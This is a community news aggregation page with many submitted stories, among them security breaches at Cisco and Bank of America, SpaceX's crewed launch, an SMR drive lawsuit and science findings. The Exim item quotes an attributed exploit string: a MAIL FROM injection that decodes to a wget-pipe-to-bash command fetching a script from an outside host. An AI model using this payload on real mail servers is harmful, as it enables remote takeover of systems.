upstart writes in with an IRC submission:

Cisco security breach hits corporate servers that ran unpatched software:

Six servers Cisco uses to provide a virtual networking service were compromised by hackers who exploited critical flaws contained in unpatched versions the open source software service relies on, the company disclosed on Thursday.

The May 7 compromise hit six Cisco servers that provide backend connectivity to the Virtual Internet Routing Lab Personal Edition (VIRL-PE), a Cisco service that lets customers design and test network topologies without having to deploy actual equipment. Both the VIRL-PE and a related service, Cisco Modeling Labs Corporate Edition, incorporate the Salt management framework, which contained a pair of bugs that, when combined, was critical. The vulnerabilities became public on April 30.

[...] Cisco said that without updates, any VIRL-PE or CML products that are deployed in standalone or cluster configurations will remain vulnerable to the same sorts of compromises. The company released software updates for the two vulnerable products. Cisco rated the severity of the vulnerabilities with a ranking of 10 out of 10 on the CVSS scale.

The Salt vulnerabilities are CVE-2020-11651, an authentication bypass, and CVE-2020-11652, a directory traversal. Together, they allow unauthorized access to the entire file system of the master salt server that services using Salt rely on. F-Secure, the firm that discovered the vulnerabilities, has a good description of them here.

Salt is described as "Software to automate the management and configuration of any infrastructure or application at scale."

Additional Info: https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/

Previously:
(2020-05-04) Recent Salt Vulnerabilities Exploited to Hack LineageOS, Ghost, DigiCert Servers

Original Submission

upstart writes in with an IRC submission:

Don't Update Your TI-83 or TI-84 Calculator's Firmware:

It's weird to think about using a calculator in 2020, when just about everyone has a smartphone or laptop within reach, but Texas Instruments' calculators are still a popular (and often required) resource for students. The latest calculators are even capable of installing and running simple applications, which makes them an excellent learning tool for coders and hardware modders. (I even modded my TI calculator to run respectable facsimiles of Doom and Super Mario back in college.)

Unfortunately, Texas Instrument is removing support of the C assembly coding language in a new firmware update to crack down on cheating. And that means a lot of homebrew programs are either going to go away entirely or have to be converted to a much slower Python version—if that's even plausible.

The update affects the TI-84 Plus CE, TI-83 Plus CE-T, and the TI-83 Premium CE calculators. Texas Instruments says it's implementing the change to stop students from installing third-party software that circumvents the "exam mode" limitation on certain TI devices. Exam mode is designed to restrict certain functionality so students can complete their work without the help of extra features—cheating, basically.

[...] That said, TI-83 and TI-84 calculator firmware must be manually downloaded to your PC and updated over USB, so users who want to remain on the older version can do so by simply not installing the new firmware—but that's your only option.

What was the most interesting thing you created that ran on a calculator?

See also: TI removes access to assembly programs on the TI-83 Premium CE

Original Submission

[20200530_203823 UTC: UPDATE: Launch was successful, all systems nominal, first stage successfully landed on the drone ship "Of Course I Still Love You", and Ben and Doug are on their 19-hour flight to the ISS (International Space Station). Live coverage continues all the way through docking.]

martyb writes:

Today's the day— weather permitting, America is returning to space:

During Wednesday's technically smooth countdown, NASA astronauts Doug Hurley and Bob Behnken came within 17 minutes of launching before a scrub due to poor weather. Now the crew will suit up and try again on Saturday despite still iffy weather.

SpaceX is working toward an instantaneous launch at 3:22pm ET (19:22 UTC). The big concern again today is the development of thunderstorms near the launch site this afternoon, which could violate a number of weather criteria, including not just precipitation, but also residual electric energy from lighting in the atmosphere. Overall, the chance of acceptable weather at launch time is about 50 percent, forecasters estimate. They are also watching for down-range conditions in case an emergency abort is required during the rocket's ascent to space.

This is nothing new for NASA or U.S. human spaceflight. As the commander, Hurley, noted on Twitter Friday that his first space mission in 2009 scrubbed five times for weather or technical issues before it finally lifted off. "All launch commit criteria is developed way ahead of any attempt," Hurley said. "This makes the correct scrub or launch decision easier in the heat of the moment."

It has been such a long, long road for NASA and SpaceX to reach this moment—thousands of engineers and technicians have labored to design, develop, test, and fly hardware for the Dragon spacecraft and Falcon 9 rocket over the last decade. But now the hardware and crew are ready, and at just the right time, to go fly.

[...] A combined NASA and SpaceX webcast will begin today at 11am ET (15:00 UTC).

Launch is scheduled for exactly 2 hours from the time this story goes live.

You can also join the discussion on channel #Soylent on IRC (Internet Relay Chat).

upstart writes in with an IRC submission:

It's not every day the NSA publicly warns of attacks by Kremlin hackers – so take this critical Exim flaw seriously:

The NSA has raised the alarm over what it says is Russia's active exploitation of a remote-code execution flaw in Exim for which a patch exists.

The American surveillance super-agency said [PDF] on Thursday the Kremlin's military intelligence hackers are actively targeting some systems vulnerable to CVE-2019-10149, a security hole in the widely used Exim mail transfer agent (MTA) that was fixed last June.

Here's a sample of Moscow's exploit code, according to the NSA, which is sent to a vulnerable server to hijack it – we've censored parts of it to avoid tripping any filters:

MAIL FROM:${run{\x2Fbin\x2Fsh\t- c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20hxxp\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be That hexadecimal decodes to: /bin/sh -c "exec /usr/bin/wget -O - hxxp://hostapp.be/script1.sh | bash"

"The Russian actors, part of the General Staff Main Intelligence Directorate's (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker's dream access – as long as that network is using an unpatched version of Exim MTA," the NSA said.

In this case, miscreants, linked to the military-backed Sandworm operation, exploit improper validation of the recipient's address in Exim's deliver_message() function in /src/deliver.c to inject and execute a shell command, which downloads and runs another script to commandeer the server. An in-depth technical description of the programming blunder can be found here by Qualys, which found and reported the flaw last year.

Because Exim is widely used on millions of Linux and Unix servers for mail, bugs in the MTA are by nature public-facing and pose an attractive target for hackers of all nations.

The NSA did not say who exactly was being targeted, though we can imagine the Russian military takes an interest in probing foreign government agencies and vital industries. GRU hackers have also previously targeted energy utilities, by some reports.

Previously: 400,000 Servers Using Exim May be at Risk of Serious Code-Execution Attacks

Original Submission

takyon writes:

Western Digital gets sued for sneaking SMR disks into its NAS channel

All three of the surviving conventional hard drive vendors—Toshiba, Western Digital, and Seagate—have gotten caught sneaking disks featuring Shingled Magnetic Recording technology into unexpected places recently. But Western Digital has been the most brazen of the three, and it's been singled out for a class action lawsuit in response.

Although all three major manufacturers quietly added SMR disks to their desktop hard drive line-up, Western Digital is the only one so far to slip them into its NAS (Network Attached Storage) stack. NAS drives are expected to perform well in RAID and other multiple disk arrays, whether ZFS pools or consumer devices like Synology or Netgear NAS appliances.

In sharp contrast to Western Digital's position on SMR disks as NAS, Seagate executive Greg Belloni told us that there weren't any SMR disks in the Ironwolf (competitor to Western Digital Red) line-up now and that the technology is not appropriate for that purpose.

[...] Hattis Law has initiated a class action lawsuit against Western Digital, accordingly. The lawsuit alleges both that the SMR technology in the newer Western Digital Red drives is inappropriate for the marketed purpose of the drives and that Western Digital deliberately "deceived and harm[ed] consumers" in the course of doing so.

Previously: AnandTech Interview With Seagate's CTO: New HDD Technologies Coming
Western Digital: Over Half of Data Center HDDs Will Use SMR by 2023
Seagate Caught Using SMR in Barracuda Compute and Desktop Drives

Original Submission

martyb writes:

One Millionth Comment!

On 2020-05-28 the SoylentNews community attained an amazing milestone: the posting of its one millionth comment!

First off, please accept my sincere thanks and gratitude to the community for all your contributions to the site to get us to this point. Never did I imagine in those first few days when comment IDs were 3 or 4 digits long that such a milestone was even feasible! I mean the site was crashing several times a day. Not an auspicious start, that's for sure! But we all pulled together, weathered some challenges, and got things pulled together.. and we're still here!

So, who was the lucky poster of comment 1,000,000? And who was the runner-up at comment 999,999 (which has a nice palindromic ring to it, wouldn't you agree?

The honor of the very first 7-digit comment fittingly goes to story-submitter extraordinaire takyon. Yes, not content to post comment ID 1000000 because that could be just a one-shot lucky break. No, he has posted (as of this writing) 18,731 comments. Oh, and as for submitting stories, he is unfortunately omitted from the "Most Active Authors" list on the SoylentNews Hall of Fame because he is also an editor. So, please join me in thanking takyon for submitting 5,852 stories! Oh! And as an editor, he has also pushed out 1,350 stories! Whenever I see one of his subs in the queue, I know it only needs a quick review before pushing it out to the story queue. He makes my job as an editor much easier and makes SoylentNews look good! Thanks takyon!

So who was our runner-up with comment number 999,999? Well, he wasn't just spinning his tires when he posted this comment. None other than our also-prolific Runaway1956! He is no slouch when it comes to posting comments, either, as he has posted 18,483 of them so far. He has taken an active part in comment moderation, too with 2,968 moderations of which 78% were upmods. As if that were not enough, he is also an active contributor to our Folding@Home team, sitting currently at 3rd place and making a hard run for 2nd place! (F@H investigates — via computer modelling — how proteins fold.) The F@H group's efforts have almost exclusively been redirected to understanding the SARS-CoV-2 virus which causes COVID-19 disease.

For those who may be unaware, SoylentNews is purely a volunteer organization. Nobody has ever been paid even one cent for their work. Further, we have never accepted any advertising on SoylentNews; the site is entirely self supporting through the subscriptions of the community. We run a tight ship and expenses run approximately $20 per day for everything.

Speaking of volunteers, it brings me great pleasure to call out another major milestone, fnord666 has now edited over 5,000 stories on SoylentNews! (See Most Active Authors.) Thanks so very much, fnord666, for all your hard work and sacrifices to make that happen!

Thanks everybody! Here's to many more years!

Original Submission

Phoenix666 writes:

Phys.org:

When lockdown measures were announced in France and other countries, secondary-school teachers and university professors had to quickly make the transition from classroom teaching to remote education. As a result, practical work was often abandoned—experiments were no longer possible without a lab, test tubes, oscilloscopes and other equipment.

To overcome this problem, some educators used digital simulations, while others analysed existing data. But people familiar with experimental science know that simulations and simple analysis do not replace the lab bench and real experiments. The role of science is to help us to understand everyday phenomena and "real" experiments are absolutely essential.

As academics working in the field of physics, we have been reflecting about developing new forms of practical work that allows for greater student autonomy for several years now. At Université de Bordeaux and Paris-Saclay, we asked our students to create their own experiment, and in some cases, to conduct them independently with smartphones or Arduino boards, an open-source solution for experiments with electronics.

Lockdown was a great chance to test autonomous practical work, so we jumped on it immediately. During the two months of French lockdown—it began on March 17 and ended May 11—we adapted and continued to teach using experiments without compromising the quality of content. These "life-size" tests convinced us that it is possible to remotely conduct lessons with experiments for both secondary-school teachers and higher-education professors. We have even observed very positive aspects of this new approach. It changes the student's relationship with science and with their teachers.

Professor Felix Hoenikker did fine with bits of string and children's toys when he developed Ice-nine, so why can't we?

Original Submission

Phoenix666 writes:

World's oldest bug is fossil millipede from Scotland:

A 425-million-year-old millipede fossil from the Scottish island of Kerrera is the world's oldest "bug"—older than any known fossil of an insect, arachnid or other related creepy-crawly, according to researchers at The University of Texas at Austin.

The findings offer new evidence about the origin and evolution of bugs and plants, suggesting that they evolved much more rapidly than some scientists believe, going from lake-hugging communities to complex forest ecosystems in just 40 million years.

[...] The team found that the ancient millipede fossil is 425 million years old, or about 75 million years younger than the age other scientists have estimated the oldest millipede to be using a technique known as molecular clock dating, which is based on DNA's mutation rate. Other research using fossil dating found that the oldest fossil of a land-dwelling, stemmed plant (also from Scotland) is 425 million years old and 75 million years younger than molecular clock estimates.

Journal Reference:
M. E. Brookfield et al.Myriapod divergence times differ between molecular clock and fossil evidence: U/Pb zircon ages of the earliest fossil millipede-bearing sediments and their significance, Historical Biology (DOI: 10.1080/08912963.2020.1761351)

For all those legs it couldn't move fast enough to avoid turning to stone.

Original Submission

Phoenix666 wrote in with a story which inspired:

CNet:

First came VR. Then came a wave of AR headsets that were high-priced and full of promises of wild mixed reality worlds. Apple now seems to be readying its own pair of smart glasses, at long last, seven years after Google Glass and four years after the debut of Oculus Rift. These reports have extended back for several years, including a story broken by CNET's Shara Tibken in 2018.

Apple has been in the wings all this time without any headset at all, although the company's aspirations in AR have been clear and well-telegraphed on iPhones and iPads for years. Each year, Apple's made significant strides on iOS with its AR tools.

The article dives into these topics at some depth:

• Normal glasses, first, with a normal name
• Lower cost than you'd think?
• iPhone-powered
• A world of QR codes, and maybe location-aware objects
• Apple's newest iPad has the sensor tech it needs
• How bleeding-edge will the visuals be?
• Look to AirPods for ease of use -- and audio augmented reality
• Apple Watch and AirPods could be great Glass companions
• Could Qualcomm and Apple's reconciliation also be about XR?
• Expect the iPhone to support other VR and AR, too
• Launch date: Still could be a year away

Will Apple Glass succeed where Google Glass failed?

Original Submission

Phoenix666 writes:

Can interactive technology ease urban traffic jams?:

Traffic congestion is a serious problem in the United States, but a new analysis shows that interactive technology -- ranging from 511 traffic information systems and roadside cameras to traffic apps like Waze and Google Maps -- is helping in cities that use it.

Potentially, the researchers said, technology could limit the need to widen and expand roadways while saving commuters time and money and lessening environmental damage.

[...] Pavlou [author of the report] said the study suggests alternatives to simply building more and bigger roads to keep up with population and traffic growth. Using large-scale technology systems in conjunction with real-time traffic apps at the individual level is less expensive and more effective than only spending funds to expand and maintain roadways, he said .

Journal Reference:
Zhi (Aaron) Cheng, Min-Seok Pang, Paul A. Pavlou. Mitigating Traffic Congestion: The Role of Intelligent Transportation Systems, Information Systems Research (DOI: sre20190894)

The real question is, when cars honk does Pavlou's mouth water?

Original Submission

Phoenix666 writes:

Technology uses plant biomass waste for self-powered biomedical devices:

An innovation turning waste material into stretchable devices may soon provide a new option for creating self-powered biomedical inventions.

A team from Purdue University used lignin to create triboelectric[*] nanogenerators. TENGs help conserve mechanical energy and turn it into power. Lignin is a waste byproduct from the pulp and paper industries, and it is one of the most abundant biopolymers on Earth.

[...] Wu said the lignin-based triboelectric devices also could function as self-powered sensors to detect and monitor the mechanical activities from the human body in applications such as health monitoring, human-machine interface, teleoperated robotics, consumer electronics and virtual and augmented reality technologies.

Journal Reference:
Yukai Bao, Ruoxing Wang, Yunmei Lu, Wenzhuo Wu. Lignin biopolymer based triboelectric nanogenerators [open], APL Materials (DOI: 015794APM)

[*] Triboelectric effect.

One man's kitchen scraps are another man's cyber-machines.

Original Submission

Phoenix666 writes:

BBC:

Drones are expected to play a role in coastguard search and rescue (SAR) operations in the near future.

The [UK's] Maritime and Coastguard Agency (MCA) wants to make greater use of the technology as part of a new SAR contract to be awarded in 2024.

The contract also covers the continued provision of rescue helicopters, including those based in Scotland, and search planes.

[...] The coastguard said unmanned aircraft could potentially visit rescue sites ahead of air, sea or land-based recovery teams.

Images and other information gathered by drones could help develop the emergency services response to a situation.

How long before terrestrial drones follow their airborne brethren into service?

Original Submission

upstart writes in with an IRC submission:

Data Breach at Bank of America:

Bank of America Corporation has disclosed a data breach affecting clients who have applied for the Paycheck Protection Program (PPP).

Client information was exposed on April 22 when the bank uploaded PPP applicants' details onto the US Small Business Administration's test platform. The platform was designed to give lenders the opportunity to test the PPP submissions before the second round of applications kicked off.

The breach was revealed in a filing made by Bank of America with the California Attorney General's Office. As a result of the incident, other SBA-authorized lenders and their vendors were able to view clients' information.

Data exposed in the breach consisted of details relating not only to individual businesses, but also to their owners. Compromised data may have included the business address and tax identification number along with the owner's name, address, Social Security number, phone number, email address, and citizenship status.

[...] In a breach notification document, a spokesperson for the bank said: "There is no indication that your information was viewed or misused by these lenders or their vendors. And your information was not visible to other business clients applying for loans, or to the public, at any time."

[...] Bank of America is offering clients affected by the breach free two-year membership of Experian's identity theft protection program.

Disclaimer: SoylentNews PBC has an account with Bank of America, but has not made an application to the PPP. In fact, since all SoylentNews staff are volunteers and have never been paid for their services, there was never any need or reason to apply for PPP.

Original Submission

Arthur T Knackerbracket has found the following story:

Astronomers have captured an image of a super-rare type of galaxy—described as a "cosmic ring of fire"—as it existed 11 billion years ago.

The galaxy, which has roughly the mass of the Milky Way, is circular with a hole in the middle, rather like a titanic doughnut. Its discovery, announced in the journal Nature Astronomy, is set to shake up theories about the earliest formation of galactic structures and how they evolve.

"It is a very curious object that we've never seen before," said lead researcher Dr. Tiantian Yuan, from Australia's ARC Centre of Excellence for All Sky Astrophysics in 3 Dimensions (ASTRO 3-D). "It looks strange and familiar at the same time."

The galaxy, named R5519, is 11 billion light-years from the Solar System. The hole at its centre is truly massive, with a diameter two billion times longer than the distance between the Earth and the Sun. To put it another way, it is three million times bigger than the diameter of the supermassive black hole in the galaxy Messier 87, which in 2019 became the first ever to be directly imaged.

"It is making stars at a rate 50 times greater than the Milky Way," said Dr. Yuan, who is an ASTRO 3-D Fellow based at the Centre for Astrophysics and Supercomputing at Swinburne University of Technology, in the state of Victoria.

"Most of that activity is taking place on its ring—so it truly is a ring of fire."

Journal Reference:
Tiantian Yuan, Ahmed Elagali, Ivo Labbé, et al. A giant galaxy in the young Universe with a massive ring, Nature Astronomy (DOI: 10.1038/s41550-020-1102-7)

Original Submission

upstart writes in with an IRC submission:

Leaked draft details Trump's likely attack on technology giants:

The Trump Administration is putting the final touches on a sweeping executive order designed to punish online platforms for perceived anti-conservative bias. Legal scholar Kate Klonick obtained a draft of the document and posted it online late Wednesday night.

[...] The document claims that online platforms have been "flagging content as inappropriate even though it does not violate any stated terms of service, making unannounced and unexplained changes to policies that have the effect of disfavoring certain viewpoints, and deleting content and entire accounts with no warning, no rationale, and no recourse."

The order then lays out several specific policy initiatives that will purportedly promote "free and open debate on the Internet."

First up is Section 230 of the Communications Decency Act.

[...] Trump's draft executive order would ask the Federal Communications Commission to clarify Section 230—specifically a provision shielding companies from liability when they remove objectionable content.

[...] Next, the executive order directs federal agencies to review their ad spending to ensure that no ad dollars go to online platforms that "violate free speech principles."

Another provision asks the Federal Trade Commission to examine whether online platforms are restricting speech "in ways that do not align with those entities' public representations about those practices"—in other words, whether the companies' actual content moderation practices are consistent with their terms of service. The executive order suggests that an inconsistency between policy and practice could constitute an "unfair and deceptive practice" under consumer protection laws.

Trump would also ask the FTC to consider whether large online platforms like Facebook and Twitter have become so big that they've effectively become "the modern public square"—and hence governed by the First Amendment.

[...] Finally, the order directs US Attorney General William Barr to organize a working group of state attorneys general to consider whether online platforms' policies violated state consumer protection laws.

[Ed Note - The following links have been added]

Follow Up Article: Trump is desperate to punish Big Tech but has no good way to do it

The Executive Order: Executive Order on Preventing Online Censorship

Original Submission